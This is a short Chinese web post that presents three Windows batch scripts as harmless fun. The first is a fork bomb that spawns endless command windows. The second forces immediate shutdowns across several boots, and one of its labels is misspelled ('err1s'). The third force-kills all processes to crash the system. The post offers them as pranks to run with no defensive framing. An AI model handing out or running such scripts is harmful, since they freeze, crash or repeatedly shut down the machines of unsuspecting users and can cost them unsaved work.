赞
踩
介绍几个好玩的代码:
1.炸弹弹窗bat
start cmd
%0
功能:蹦出无限个弹窗
2.反复关机bat:
@echo off
if not exist c:1.txt echo. >c:1.txt & goto err1
if not exist c:2.txt echo. >c:2.txt & goto err1
if not exist c:3.txt echo. >c:3.txt & goto err1s
goto err2
:err1
shutdown -s -t 0
:err2
这个默认关机重启三次,当然也可以自己更改
3.蓝屏bat(重启一下就解除了)
taskkill /f /fi "pid ne 1"
以后有时间,我会继续更新的
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。